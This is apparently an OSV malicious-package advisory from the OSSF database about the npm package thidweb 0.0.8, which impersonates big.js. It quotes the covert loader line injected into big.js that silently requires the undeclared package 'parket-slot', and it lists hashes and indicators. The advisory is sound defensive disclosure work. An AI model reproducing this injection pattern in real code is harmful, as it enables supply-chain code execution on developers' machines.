{"id":"MAL-2026-6343","summary":"Malicious code in thidweb (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (80721058923b3e5963a6ee170007b8b4131ae5093481456ca10e63f52963987d)\nPackage is published as `thidweb` but its README, source comments, repo URL, and author metadata all identify it as big.js v7.0.1 by Mike McLaughlin (README.md line 1 `# big.js`; big.js header `big.js v7.0.1`; package.json repository url `https://github.com/MikeMcl/big.js.git`). The source is a verbatim copy of upstream big.js with a covert loader injected mid-file at big.js:605-609: `try { const doc = require(\"parket-slot\"); doc.from_str().then(e =\u003e { }).catch(e =\u003e { }) } catch (error) { }`. The same block is present in big.mjs. `parket-slot` is not declared in `package.json` dependencies; the only declared dependency is `log-taker@^0.0.9`, which upstream big.js does not require (upstream is dependency-free). Any developer who installs `thidweb` (mistaking it for big.js) and imports it executes whatever code `parket-slot` ships, with errors silently swallowed.\nThe combination of impersonation, undeclared runtime require, error-suppressing try/catch, and an unrelated declared dependency is a multi-stage installer-side code-execution attack.\n","modified":"2026-06-23T21:01:21.969570772Z","published":"2026-06-23T20:01:26Z","database_specific":{"malicious-packages-origins":[{"id":"IN-MAL-2026-007356","source":"amazon-inspector","sha256":"80721058923b3e5963a6ee170007b8b4131ae5093481456ca10e63f52963987d","modified_time":"2026-06-23T20:01:26Z","versions":["0.0.8"],"import_time":"2026-06-23T20:48:30.715119057Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/thidweb/v/0.0.8"}],"affected":[{"package":{"name":"thidweb","ecosystem":"npm","purl":"pkg:npm/thidweb"},"versions":["0.0.8"],"database_specific":{"cwes":[{"name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506"}],"indicators":{"evidence_files":[{"path":"big.js","tlsh":"24c2658c3ac67579593363788f4a5088eb38525712c8b186b4ae63b46f78cb107b5fdc","sha256":"5b803b2bbd43db704b5802fa5bf4da96e79c3b876d74495116b53a837101dace"},{"path":"package.json","tlsh":"59213463c9a59da70af85ba47c6c03aef1151b1f00a04c17b07b130c4f3345b2096b7d","sha256":"b45b4819897cf8421385b6cba4fb1ab287a762cc7d979c79041298202d02d7e4"}],"package_integrity":[{"filename":"thidweb-0.0.8.tgz","hashes":{"sha1":"04e7457d06345536d4bd78c9e0a34e5598ac5ecc","sha512_sri":"sha512-YU0zyLSumbR4vpqZ5emFW3M5I38jX4DtdP/xKPTNoj97robUvHd46iJvHKi5lyJjC77yYBJjtQRtOFmCnmGUXw=="}}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/thidweb/MAL-2026-6343.json"}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}